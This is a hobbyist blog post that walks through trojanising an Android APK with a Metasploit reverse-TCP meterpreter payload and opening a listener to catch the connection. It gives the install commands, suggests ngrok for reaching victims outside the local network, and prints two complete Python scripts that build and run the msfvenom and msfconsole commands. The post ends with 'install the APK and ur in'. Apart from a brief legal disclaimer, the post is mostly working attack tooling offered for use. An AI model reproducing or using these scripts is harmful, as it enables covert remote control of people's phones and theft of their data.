HOW TO INJECT MSF PAYLOAD INTO APK AND SETUP A LISTENER WITH JUST 2 SCRIPTS!! (I WROTE)

Uncategorized 3 Minutes

HERE IS THE GUIDE … ENJOY

WARNING !

  • DO NOT USE THIS METHOD FOR ANY ILLEGAL ACCESS (THAT CAN PUT U IN JAIL).
  • THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.
  • I’M NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITY YOU DO
  • YOU MUST HAVE WRITTEN PERMISSION TO USE IT ON ANYONE
  • USE IT AT UR OWN RISK

^READ THE WARNING BEFORE U CONTINUE^

WHAT WILL WE NEED

We will need

  • Metasploit (of course)
  • apktool
  • default-jdk
  • default-jre
  • zipalign
  • Python3
  • THE 2 SCRIPTS I WROTE
  • THE APK FILE THAT THE PAYLOAD WILL BE INJECTED INTO
  • Ngrok (if u want to use the apk outside the local network)

INSTALL EVERYTHING

we will simply run that command in the terminal to install everything

sudo apt update && sudo apt upgrade -y && sudo apt install metasploit-framework apktool default-jdk default-jre zipalign python3 -y

If you want to use the APK outside the local network use ngrok (if you don’t know how to set it up i’v got u covered, i wrote an post about that HERE )

DOWNLOAD THE SCRIPTS

At first we will download the two scripts (injector and a listener)

FOR THE INJECTOR CLICK HERE

FOR THE LISTENER CLICK HERE

THE TWO FILES IN AN ARCHIVE HERE

PLEASE DOWNLOAD FROM ABOVE LINKS TO SUPPORT ME
BUT I CANT FORCE U TO DO IT SO HERE ARE THE DIRECT LINKS

FOR THE INJECTOR (DIRECT LINK) CLICK HERE

FOR THE LISTENER (DIRECT LINK) CLICK HERE

THE TWO FILES IN AN ARCHIVE (DIRECT LINK) HERE

RUN THE SCRIPTS

WE WILL JUST OPEN A TERMINAL AND CHANGE THE DIR. TO THE DOWNLOADS FOLDER

AND TYPE THAT IN THE TERMINAL

python3 MSAPI_injector.py

and give it the required info

Path to original apk file : PATH.apk
LHOST (attacker local ip) : IP
LPORT (attacker local open port) : PORT
Path to save the injected apk : HERE.apk

and how simple is that you now have the payload

NOW RUN THE LISTENER

python3 MSAPL_listener.py

and give it the required info

LHOST (default 0.0.0.0) : ip
lhost = ip
LPORT (default 4444) : port
lport = port

NOW INSTALL THE APK AND UR IN

BONUS :

  • PYTHON INJECTOR SCRIPT
#-------------------------------------------
# This python script lets you inject payload 
# into apk using Msfvenom 
# made with love 🙂
# Znqr Ol QnExGbAr
# ROT13
# 
# //    //  //
# //    //     
# ////////  //
# //    //  //
# //    //  //
#-------------------------------------------


#----------------------
# importing libs
#----------------------


import os


#----------------------
# warning
#----------------------


print("MSAPI (MetaSploit Android Payload Injector)")
print(" ")
print("Note That You Must Have Metasploit And Apktool Installed ,")
print("  And Must Have Root Privileges To Use This Tool ")
print(" ")


#----------------------
# getting info
#----------------------


apk_original = input("Path to original apk file : ")

lhost = input("LHOST (attacker local ip) : ")

lport = input("LPORT (attacker local open port) : ")

apk_injected = input("Path to save the injected apk : ")


#----------------------
# saving the command
#----------------------


command = "sudo msfvenom -x " + apk_original + " -p android/meterpreter/reverse_tcp LHOST=" + lhost + " LPORT=" + lport + " -o " + apk_injected

print(" ")
print("Please Wait Up To 5 Minutes")
print(" ")


#----------------------
# executing
#----------------------


os.system(command)


#----------------------
# after executing 
#----------------------


print(" ")
print("Please Support Me If That Worked, if u know me ;)")
print("And Dont Forget, DECODE The CODE And Read The Source CODE")


#----
#BYE
#----
  • PYTHON LISTENER SCRIPT
#--------------------------------------------
# This python script lets you open a listener
# using metasploit for the payload u created
# made with love 🙂
# Znqr Ol QnExGbAr
# ROT13
# 
# //    //  //
# //    //     
# ////////  //
# //    //  //
# //    //  //
#--------------------------------------------


#----------------------
# importing libs
#----------------------


import os


#----------------------
# warning
#----------------------


print("MSAPL (MetaSploit Android Payload Listener)")
print(" ")
print("Note That You Must Have Metasploit Installed and have a payload to use this script ,")
print(" ")


#----------------------
# getting and checking info
#----------------------


lhost = input("LHOST (default 0.0.0.0) : ")

if(lhost == ''):
	lhost = "0.0.0.0"
else:
	lhost = lhost
print("lhost = " + lhost)


lport = input("LPORT (default 4444) : ")

if(lport == ''):
	lport = "4444"
else:
	lport = lport
print("lport = " + lport)


#----------------------
# command
#----------------------


command = 'msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost  ' + lhost + '; set lport ' + lport + '; exploit"'


#----------------------
# Done
#----------------------


print(" ")
print("Please Support Me If That Workes, if u know me ;)")
print("And Dont Forget, DECODE The CODE And Read The Source CODE")
print(" ")
print("PLEASE WAIT UP TO 5 MINUTES(UR COMPUTER MAY BE SLOW)")
print(" ")


#----------------------
# executing
#----------------------

os.system(command)

# BYE

AS I PROMISED HERE IS THE WAY

Hope i helped u all

Stay Tuned 😀

Unknown's avatar

Published by DaRkToNe

Published

Leave a comment